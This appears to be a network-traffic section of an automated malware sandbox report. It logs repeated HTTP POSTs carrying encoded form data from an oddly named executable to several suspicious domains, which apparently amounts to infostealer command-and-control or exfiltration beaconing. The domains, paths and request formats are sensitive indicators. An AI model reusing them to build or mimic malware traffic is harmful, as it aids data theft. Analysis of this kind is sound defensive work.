                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                          Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("b5c8267bc256c89f7074d57c4d2ebc21");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.amayavp.xyz/d9ku/?b6=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94J8e6gZfcDjEsysW5sV4r35t/PcxyDEU8Ed58PWAzm7Gn7pjmnX0=&sDDX=EfDhNx4xefjT3b5P&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          17 | 192.168.2.6 | 49999 | 172.67.145.234 | 80 | 768 | C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 23:28:55.640727043 CET | 745 | OUT | POST /vg0z/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.vayui.top
                                                          Origin: http://www.vayui.top
                                                          Referer: http://www.vayui.top/vg0z/
                                                          Cache-Control: no-cache
                                                          Content-Length: 207
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 32 37 47 45 30 57 34 36 48 49 4c 61 57 71 56 57 64 4e 35 42 6a 6a 4b 4f 39 47 43 38 73 4d 57 78 4d 39 69 44 32 34 50 5a 2f 53 43 30 51 43 58 38 57 6b 6a 58 38 43 72 30 72 4c 50 41 41 44 70 47 6e 57 6b 65 7a 56 4d 4b 39 39 64 7a 37 32 56 5a 30 32 64 6b 51 61 43 4b 33 72 34 61 56 6a 59 70 73 69 4f 37 55 67 6a 6c 56 6f 69 62 46 34 7a 55 65 2b 61 39 76 77 59 48 6a 52 4f 6c 75 35 41 67 5a 75 77 4b 66 4f 41 43 45 5a 61 76 37 65 51 51 2f 50 66 61 58 4c 4a 37 36 69 43 2b 54 33 42 44 56 33 62 79 4f 36 79 71 2b 43 5a 48 7a 65 58 5a 79 33 31 77 4d 4a 67 6b 45 68 41 44 58 6b 43 6c 72 5a 4a 43 4a 72 4e 37 37 71 34 30
                                                          Data Ascii: b6=27GE0W46HILaWqVWdN5BjjKO9GC8sMWxM9iD24PZ/SC0QCX8WkjX8Cr0rLPAADpGnWkezVMK99dz72VZ02dkQaCK3r4aVjYpsiO7UgjlVoibF4zUe+a9vwYHjROlu5AgZuwKfOACEZav7eQQ/PfaXLJ76iC+T3BDV3byO6yq+CZHzeXZy31wMJgkEhADXkClrZJCJrN77q40
                                                          Dec 3, 2024 23:28:57.237117052 CET | 912 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 22:28:57 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XBt3%2B%2BPrqpUtsr0PSrY9vfS6p%2BSY%2Fho%2B2kDWEGJpkz4clJgh5OhMnxSR1MjALPZ6BdJ4MypXPShu8BCz9w9oo6VFguH%2FOnL617KmFzy7Le4qJ81eYhkZSe7JTDbWqYTl"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ec6fe1d9c5d18ea-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1456&min_rtt=1456&rtt_var=728&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=745&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          18 | 192.168.2.6 | 50005 | 172.67.145.234 | 80 | 768 | C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 23:28:58.305460930 CET | 769 | OUT | POST /vg0z/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.vayui.top
                                                          Origin: http://www.vayui.top
                                                          Referer: http://www.vayui.top/vg0z/
                                                          Cache-Control: no-cache
                                                          Content-Length: 231
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Ascii: b6=27GE0W46HILaWKFWfqVBrjKRhWC8isXZM9uD29vJ/hm0Qmb8YFjX1Sr0krPYOjpPnWY8zXIK95Nz70NZ0ndlSKCEsb4cbDYpsiO7UkKtVpKbFIDUefa+wAYGiROl/pAkZuxZfKBnEbiv7acQ+d3ZeLJ55SD9DU0mb2CeC868vyls7IKDuE1TeZAmEjYxXECPpZxCb8Bc0edXmBJOoSF2xKPrz0UlyHkqFQ==
                                                          Dec 3, 2024 23:28:59.554809093 CET | 908 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 22:28:59 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zan3ks7g%2FmWr2oE6XaRVZtrrrZU39zQM%2BLpmULiZlBL4rcDB1w6mspGhyHqnySJFLUdXWeMpHpfaVo9zN1O0beDeywvGGsi%2BWQ3iWRm0nNvJ2ZiDP5YJzVxE%2BeqBwPp9"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ec6fe2e4b9f43e3-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1621&min_rtt=1621&rtt_var=810&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=769&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          19 | 192.168.2.6 | 50013 | 172.67.145.234 | 80 | 768 | C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 23:29:00.977037907 CET | 1782 | OUT | POST /vg0z/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.vayui.top
                                                          Origin: http://www.vayui.top
                                                          Referer: http://www.vayui.top/vg0z/
                                                          Cache-Control: no-cache
                                                          Content-Length: 1243
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Dec 3, 2024 23:29:02.517219067 CET | 907 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 22:29:02 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uuGmHRhyp2yInOtvh4Fa470vyDVmqr%2Bl9RWhf7URkL23c4RihzoCzts6zcqeO264QGXdjLKqRWHHQuzZhvqj51n71VSC4Jr9yBbx%2BFADvHm64439trgEe%2BL397uOcc9K"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ec6fe3edecc15d7-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1581&min_rtt=1581&rtt_var=790&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1782&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          20 | 192.168.2.6 | 50021 | 172.67.145.234 | 80 | 768 | C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 23:29:03.638772011 CET | 501 | OUT | GET /vg0z/?b6=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTFrWSncccbEBJ6T2ZUmHvVL3BVpynffLQ4AgBix/2srBcYLhAIes=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.vayui.top
                                                          Connection: close
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Dec 3, 2024 23:29:04.923130989 CET | 923 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 22:29:04 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zRdhCF7lc3yjw0%2F%2FfAxy5m4RakYA0D6ABxTwWEzEOoDEuVyOYXy6rRvqpPZ5QuDKPojZv0lfE1E8HbF%2B8fvj3e8nxYV3WqcPcrpSFy8SxPu7R4j1yIe9qTbP%2Blep%2B2dg"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ec6fe4fc99e430f-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1605&rtt_var=802&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=501&delivery_rate=0&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          21 | 192.168.2.6 | 50030 | 172.67.167.146 | 80 | 768 | C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 23:29:10.493513107 CET | 769 | OUT | POST /o362/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.rgenerousrs.store
                                                          Origin: http://www.rgenerousrs.store
                                                          Referer: http://www.rgenerousrs.store/o362/
                                                          Cache-Control: no-cache
                                                          Content-Length: 207
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Ascii: b6=IYlouYrI0yQl1UhjbhrWg9A4XW4aDAbXtcqQZ2cDb3pAvvZh2/rT9+WaSXJu8H08nFh0ZCzh2MZq44g+sMHvA3m37j+OAwRiGhkY3OrFfzUmrUKfalDc6DOlVUeg9cFBlOkX4fw2xo6AVCaNZRoCMCZ5aJXqmgHNmqtUbjjl0RzTxe42+PZlk43VL3DIaFEs/cv1lW59Re6B
                                                          Dec 3, 2024 23:29:12.024136066 CET | 1095 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 22:29:11 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rGwW8YZYGqXOQ2GQX69tYzoGLflPrPMbc01lRT8n4bvnZ%2BlgUCNR4pu3LZKIcAG3Mgn2Qj0SV82KEBsuufhLLdwoX2l5BDfZ1IjNnVcNzcUlcr5ZtMbQVFpkANSuiYOYWU6JXl8AFnw%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ec6fe7ad90a8c36-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1825&min_rtt=1825&rtt_var=912&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=769&delivery_rate=0&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          22 | 192.168.2.6 | 50031 | 172.67.167.146 | 80 | 768 | C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 23:29:13.158278942 CET | 793 | OUT | POST /o362/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.rgenerousrs.store
                                                          Origin: http://www.rgenerousrs.store
                                                          Referer: http://www.rgenerousrs.store/o362/
                                                          Cache-Control: no-cache
                                                          Content-Length: 231
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Ascii: b6=IYlouYrI0yQlz1RjZGHWsNA5d24aJgactcmQZ0wTYB5AvLJh16HT++WaZ3JRzn1RnFsJZHTh2Mlq44w+t/vsDHm5wD+MOQRiGhkY3OP8f34mrkafbAvb3jOiWUegqMFFlOkl4dFTxu+AVGKNYAoBGCZzXpWulTDHuIYlbCfZuz7s5Ilsi8ZG2oXXL1b6alEG9cX13B1aeqfi17pD2M6uubwdoMdFxzq88Q==
                                                          Dec 3, 2024 23:29:14.600403070 CET | 1094 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 22:29:14 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7vyIQgYeCQleSOWRI0XZtNLF8kqFlrdffjaihyJMmpO8P2MmknId7gI4wLHoWLJZiNM3vYl2t%2B92Ux%2Blx9n2eHIBH3d%2BdwaJS313hYLB2OpzLqT9ktwoWGOkNs3bZkOV5OLje3lHEhY%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ec6fe8b3d358c15-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1809&min_rtt=1809&rtt_var=904&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=793&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          23 | 192.168.2.6 | 50032 | 172.67.167.146 | 80 | 768 | C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 23:29:15.830732107 CET | 1806 | OUT | POST /o362/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.rgenerousrs.store
                                                          Origin: http://www.rgenerousrs.store
                                                          Referer: http://www.rgenerousrs.store/o362/
                                                          Cache-Control: no-cache
                                                          Content-Length: 1243
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Ascii: b6=IYlouYrI0yQlz1RjZGHWsNA5d24aJgactcmQZ0wTYBxAv8hh2ZfT/+WaHHJUzn1pnF0NZHXx2Khq4e8+qOvsY3m5/j+BAwQ4Gh0D3Of8f34mriWfPlDbkTOlVUfv9cFtlOtS4dAm2eeAMmaNVSwBKCZ1ZJWIlUKduM4+bC7zuzPspPYalMIRsqTLSHTOcTsh5OnS2wouQ7vb0+xV9Mnp4dF0j40Uw3z3gqJ7WKR46DLHNifflTJ+M+S8Yjg6Ya0KYirLSTO0eIgAjfYC4ByjI+ySq+swb4CybPumrHAK1UEqYtyHJcuQe3rSqI+moESmyd7jNqBCUaWjtUM9+Dp/kHXMpLs7t5ebaFEVA4nOPf2rWzp1mCH6xH426LkwrEcTlUtp9HY5OIMv2aqagH3a8OuGoirChRHi6eyXL3WIU23gKACOsHW0jarXUxcbaBiIuFWpazD/1sC4PsUMOIyCLziuPW/FgtnH+7OBp85ndDSFm1sMOXgiaUUGpraPapF1S15IE1g0C3/n/+IoyBvnr9wiDOi2n3moHO4r/SBOxSa7V0HfP+yJPmw6wj+pmE05XuMNcpOK2vJpsws4LrxeqWcq2YXe6eHdhSVZ1E+p6aQmIJeZ3ebloKDzPCWS42BFxNgXfkSQ7BCFBDXuUKHfHgx99hkNmn5dUe2RazIEV7tJSCMu7LD8YuoQfJElT3+DKh5Elo5/elE0L8FNE2gudvySpv2ErInJWB9TXipWLBTxAYboie4AXPR8+LT0imYTOQH/1uY+zuekhVm5yIyBI3FeLRYLzDac4jxl56vDANn920pQ6ZuQMdy/iwFSTjdl7cfJrUtShP858te5jA5CLGmsldeawfsoETBdh7cNybT1HrCsv+dSxJXuK/eNaMgK2+XSXQnkr4Rd/IwDht0lUIqrjJ5mJ/T7aJBEMgSJDazPlnuEWG11ec8rfDfs/Tsfk0ERbBQUkhh1PwX1WDpR4emyONBPlA3Tkmvh7flClkfBOt/Gq [TRUNCATED]
                                                          Dec 3, 2024 23:29:17.308475971 CET | 1092 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 22:29:17 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HS5drpFChwJ328d1XNN0it3lxzzDZlwcJI72QUKoQQUEqX%2F4oZekHZd0JvFPN5i3uar0%2FmYDU%2FOZM3bcG0xwADWXieDcwkcBbnbtQoOMUNh0M9HYO%2BeG3CXA6jlzYUchyOYQ971cp74%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ec6fe9c2af9efa7-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1788&min_rtt=1788&rtt_var=894&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1806&delivery_rate=0&cwnd=135&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*
                                                          Dec 3, 2024 23:29:17.310004950 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          24 | 192.168.2.6 | 50033 | 172.67.167.146 | 80 | 768 | C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 23:29:18.496896029 CET | 509 | OUT | GET /o362/?b6=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqA0qO3SSFE3YHITh7+9T1aVwk8yasaXm8yz75cRrj4u8mi8kZiIg=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.rgenerousrs.store
                                                          Connection: close
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Dec 3, 2024 23:29:19.933777094 CET | 1113 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 03 Dec 2024 22:29:19 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yPf1IiQcliVuwc3mFxRJvJp8WgPKsXPOXeG9fGTrnLcPgY0y%2BXfBjUh%2F4yy2Pc0UkgVDGudBThhs1a%2FJSbFgEQjriNgwoeN4ufZAdvIQfyqeC59nW7Qly%2FbS7OK0g5ihVlU9hUBuINk%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ec6feac9e3bf78d-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1602&rtt_var=801&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=509&delivery_rate=0&cwnd=52&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Ascii: 119<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>0


                                                          Session ID:25
                                                          Source IP:192.168.2.6
                                                          Source Port:50034
                                                          Destination IP:154.88.22.101
                                                          Destination Port:80
                                                          PID:768
                                                          Process:C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp:Dec 3, 2024 23:29:25.623222113 CET
                                                          Bytes transferred:748
                                                          Direction:OUT
                                                          Data:POST /jhb8/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.t91rl7.pro
                                                          Origin: http://www.t91rl7.pro
                                                          Referer: http://www.t91rl7.pro/jhb8/
                                                          Cache-Control: no-cache
                                                          Content-Length: 207
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Ascii: b6=5TfV9gqaBlkLoGYAnELFEog0dkU/v/cUBy9KwWd+W02Ey1WX0SfkHZv2OAW1u/xQxVW+fvfy+uAZW3kWjerY0J0i1BmictFUXimJy11eYFKjqxRn95wPtcbYZtN9hkIsmPiuIY/cejarvuVhl7S2FEJSP/lMTQC/TnD91yl3BCaiqVIzjfSQYhH82giw5nAWa2P7vlayUzK6
